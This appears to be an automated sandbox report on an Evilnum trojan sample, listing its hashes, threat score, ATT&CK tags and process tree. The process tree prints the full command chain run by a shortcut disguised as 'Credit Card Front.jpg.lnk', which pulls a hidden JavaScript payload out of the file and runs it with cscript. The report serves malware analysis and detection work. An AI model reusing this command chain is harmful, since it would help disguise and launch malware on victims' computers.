evilnum | ceb892d73cbfea205239dab384101305a957bfd675486a126787a74068c1ddea

Analysis

Target

ceb892d73cbfea205239dab384101305a957bfd675486a126787a74068c1ddea.lnk
Size

174KB
MD5

70a03cefc2345047ad3d42175e15536c
SHA1

bd8d4c93234b01a155128e3fabb61ae1cc81b5f1
SHA256

ceb892d73cbfea205239dab384101305a957bfd675486a126787a74068c1ddea
SHA512

29ea66dd13441030dac3140ba593b8ebc51f5b582636d03ae1a3b19dabd6047750ba1ed6dacaf04471a51c8bf10862ef0c9a0785f948f03fc02a3a24bba7be52

Score

10^/10

evilnum trojan

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1700 wrote to memory of 1764	1700	cmd.exe	28
PID 1700 wrote to memory of 1764	1700	cmd.exe	28
PID 1700 wrote to memory of 1764	1700	cmd.exe	28
PID 1764 wrote to memory of 472	1764	cmd.exe	29
PID 1764 wrote to memory of 472	1764	cmd.exe	29
PID 1764 wrote to memory of 472	1764	cmd.exe	29
PID 1764 wrote to memory of 564	1764	cmd.exe	30
PID 1764 wrote to memory of 564	1764	cmd.exe	30
PID 1764 wrote to memory of 564	1764	cmd.exe	30
PID 1764 wrote to memory of 316	1764	cmd.exe	31
PID 1764 wrote to memory of 316	1764	cmd.exe	31
PID 1764 wrote to memory of 316	1764	cmd.exe	31
PID 1764 wrote to memory of 668	1764	cmd.exe	32
PID 1764 wrote to memory of 668	1764	cmd.exe	32
PID 1764 wrote to memory of 668	1764	cmd.exe	32
PID 1764 wrote to memory of 1016	1764	cmd.exe	33
PID 1764 wrote to memory of 1016	1764	cmd.exe	33
PID 1764 wrote to memory of 1016	1764	cmd.exe	33

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\ceb892d73cbfea205239dab384101305a957bfd675486a126787a74068c1ddea.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1700
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Credit Card Front.jpg.lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Cred*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1764
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Cred*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:564
- - C:\Windows\system32\find.exe
    find "TRU4"
    3⤵
    PID:316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:668
- - C:\Windows\system32\cscript.exe
    cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    PID:1016

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/1700-54-0x000007FEFB771000-0x000007FEFB773000-memory.dmp

Filesize
8KB

Download